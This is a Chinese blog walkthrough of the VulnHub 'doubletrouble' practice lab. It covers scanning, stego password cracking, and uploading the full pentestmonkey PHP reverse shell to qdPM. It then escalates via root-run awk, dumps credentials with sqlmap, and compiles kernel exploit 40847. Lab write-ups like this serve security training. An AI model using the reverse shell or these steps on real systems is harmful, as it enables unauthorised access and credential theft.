vulnhub靶机doubletrouble

已于 2023-10-06 13:55:44 修改
阅读量132 收藏
点赞数
分类专栏: vulnhub 文章标签: web安全 系统安全 安全 网络安全 网络攻击模型
于 2023-10-06 13:54:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/133610796
版权

下载地址:doubletrouble: 1 ~ VulnHub

主机发现

arp-scan -l

端口扫描

nmap --min-rate 1000 -p- 192.168.21.151

端口服务扫描

nmap -sV -sT -O -p22,80 192.168.21.151

漏洞扫描

nmap --script=vuln -p22,80 192.168.21.151

先去看看web页面

这里使用的是qdpm

找一下漏洞

接下来弄一下网站的目录

dirsearch -u http://192.168.21.151

找一下不是模板的文件夹

估计要从这个图片入手了,先下载下来

文件西安基础的看一下

用一下新的工具试试

需要密码

那就爆破一下看看行不行

搞定

去看看这个文件

这个就是登入的账号密码了

发现上传点

那就简单的找一个reverse吧,网上随便找

反弹shell脚本(php-reverse-shell)_落寞的魚丶的博客-CSDN博客

<?php

// php-reverse-shell - A Reverse Shell implementation in PHP

// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

//

// This tool may be used for legal purposes only.  Users take full responsibility

// for any actions performed using this tool.  The author accepts no liability

// for damage caused by this tool.  If these terms are not acceptable to you, then

// do not use this tool.

//

// In all other respects the GPL version 2 applies:

//

// This program is free software; you can redistribute it and/or modify

// it under the terms of the GNU General Public License version 2 as

// published by the Free Software Foundation.

//

// This program is distributed in the hope that it will be useful,

// but WITHOUT ANY WARRANTY; without even the implied warranty of

// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the

// GNU General Public License for more details.

//

// You should have received a copy of the GNU General Public License along

// with this program; if not, write to the Free Software Foundation, Inc.,

// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

//

// This tool may be used for legal purposes only.  Users take full responsibility

// for any actions performed using this tool.  If these terms are not acceptable to

// you, then do not use this tool.

//

// You are encouraged to send comments, improvements or suggestions to

// me at pentestmonkey@pentestmonkey.net

//

// Description

// -----------

// This script will make an outbound TCP connection to a hardcoded IP and port.

// The recipient will be given a shell running as the current user (apache normally).

//

// Limitations

// -----------

// proc_open and stream_set_blocking require PHP version 4.3+, or 5+

// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.

// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.

//

// Usage

// -----

// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.



set_time_limit (0);

$VERSION = "1.0";

$ip = '127.0.0.1';  // CHANGE THIS

$port = 1234;       // CHANGE THIS

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;



//

// Daemonise ourself if possible to avoid zombies later

//



// pcntl_fork is hardly ever available, but will allow us to daemonise

// our php process and avoid zombies.  Worth a try...

if (function_exists('pcntl_fork')) {

       // Fork and have the parent process exit

       $pid = pcntl_fork();

      

       if ($pid == -1) {

              printit("ERROR: Can't fork");

              exit(1);

       }

      

       if ($pid) {

              exit(0);  // Parent exits

       }



       // Make the current process a session leader

       // Will only succeed if we forked

       if (posix_setsid() == -1) {

              printit("Error: Can't setsid()");

              exit(1);

       }



       $daemon = 1;

} else {

       printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");

}



// Change to a safe directory

chdir("/");



// Remove any umask we inherited

umask(0);



//

// Do the reverse shell...

//



// Open reverse connection

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

       printit("$errstr ($errno)");

       exit(1);

}



// Spawn shell process

$descriptorspec = array(

   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from

   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to

   2 => array("pipe", "w")   // stderr is a pipe that the child will write to

);



$process = proc_open($shell, $descriptorspec, $pipes);



if (!is_resource($process)) {

       printit("ERROR: Can't spawn shell");

       exit(1);

}



// Set everything to non-blocking

// Reason: Occsionally reads will block, even though stream_select tells us they won't

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);



printit("Successfully opened reverse shell to $ip:$port");



while (1) {

       // Check for end of TCP connection

       if (feof($sock)) {

              printit("ERROR: Shell connection terminated");

              break;

       }



       // Check for end of STDOUT

       if (feof($pipes[1])) {

              printit("ERROR: Shell process terminated");

              break;

       }



       // Wait until a command is end down $sock, or some

       // command output is available on STDOUT or STDERR

       $read_a = array($sock, $pipes[1], $pipes[2]);

       $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);



       // If we can read from the TCP socket, send

       // data to process's STDIN

       if (in_array($sock, $read_a)) {

              if ($debug) printit("SOCK READ");

              $input = fread($sock, $chunk_size);

              if ($debug) printit("SOCK: $input");

              fwrite($pipes[0], $input);

       }



       // If we can read from the process's STDOUT

       // send data down tcp connection

       if (in_array($pipes[1], $read_a)) {

              if ($debug) printit("STDOUT READ");

              $input = fread($pipes[1], $chunk_size);

              if ($debug) printit("STDOUT: $input");

              fwrite($sock, $input);

       }



       // If we can read from the process's STDERR

       // send data down tcp connection

       if (in_array($pipes[2], $read_a)) {

              if ($debug) printit("STDERR READ");

              $input = fread($pipes[2], $chunk_size);

              if ($debug) printit("STDERR: $input");

              fwrite($sock, $input);

       }

}



fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);



// Like print, but does nothing if we've daemonised ourself

// (I can't figure out how to redirect STDOUT like a proper daemon)

function printit ($string) {

       if (!$daemon) {

              print "$string\n";

       }

}



?>

记得改ip我忘了

上传就可以

访问就可以(前文的uploads里面)

上传的时候会有报错回显不管就行

访问

记得开netcat

搞定

改一下shell

python -c 'import pty;pty.spawn("/bin/bash")'

信息收集

此时是用root运行的awk

GTFOBins看一下

拿下

发现root里面不是flag而是一个ova下载下来

在靶机里面开一个http服务

再开一个靶机

主机发现

arp-scan -l

目标192.168.21.162

端口扫描

nmap --min-rate 1000 -p- 192.168.21.162

端口服务扫描

nmap -sV -sT -O -p22,80 192.168.21.162

漏洞扫描

nmap --script=vuln -p22,80 192.168.21.162

去web看看

先试试上面没扫全这个是自己写的大概率有sql

根据提示看到这里确实有问题

直接一把梭

sqlmap -u http://192.168.21.162/index.php --batch --forms -dbs

sqlmap -u http://192.168.21.162/index.php --batch --forms -D doubletrouble –tables

sqlmap -u http://192.168.21.162/index.php --batch --forms -D doubletrouble -T users –columns

sqlmap -u http://192.168.21.162/index.php --batch --forms -D doubletrouble -T users -C username,password –dump

Ssh登入

登入只有一个成功

信息收集

干干净净(linux3.2有洞,利用就行)

复制到桌面

执行建议web

下载文件

编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

执行40847

搞定

切换账户

结束

拿下!

himobrinehacken
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 636
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
Web安全之XSS跨站脚本攻击
good good study day day up
08-29 1887
XSS漏洞简介、原理、攻击方式、危害、常用标签、绕过技巧、防御
【补-网络安全】日常运维(二)终端端口占用排查
最新发布
Ryoujou的博客
09-02 132
端口占用及开放情况
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 705
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1298
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 1178
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-30 888
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全宗旨和目标
网络研究观
09-02 369
网络安全涉及网络和相关数据及信息的保护与保障。它已从物理技术发展到防病毒和反网络钓鱼平台等软件方法。
网络安全-安全渗透简介和安全渗透环境准备
weixin_57370131的博客
08-26 1749
安全渗透简介和安全渗透测试环境准备。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-30 2161
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
网络安全基础】网络安全的基本概念与威胁
weixin_39372311的博客
09-02 504
网络安全是指保护计算机网络和系统免受未经授权的访问、攻击、损害或破坏的技术和实践。网络安全的目标是确保信息的机密性、完整性和可用性,简称CIA三要素。机密性:保证信息只能被授权的用户或系统访问和读取。完整性:确保信息在存储、传输或处理过程中不被未经授权的篡改或破坏。可用性:确保系统和数据在需要时可以被合法用户访问。
网络安全售前入门09安全服务——安全加固服务
打工人
09-02 854
安全加固服务是参照风险评估、等保测评、安全检查等工作的结果,基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践,为客户提供完善的安全加固方案,并在客户侧反馈完成加固后,提供二次评估服务,从而帮助客户达到修补信息系统脆弱性,提高系统安全性,满足相关政策法规的目的。
网络安全】XSS+OTP绕过+账户接管
等风来
09-01 184
因此,能够实现接管账户,但此漏洞需要用户交互,危害程度降低。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-01 889
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
等保测评:如何有效进行安全事件响应
2301_79955948的博客
08-29 519
安全事件得到解决后,应对事件进行记录,分析记录信息,并补充所需信息,使安全事件成为已知事件。同时,应对安全事件处置过程进行总结,制定处置报告,并保存相关记录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值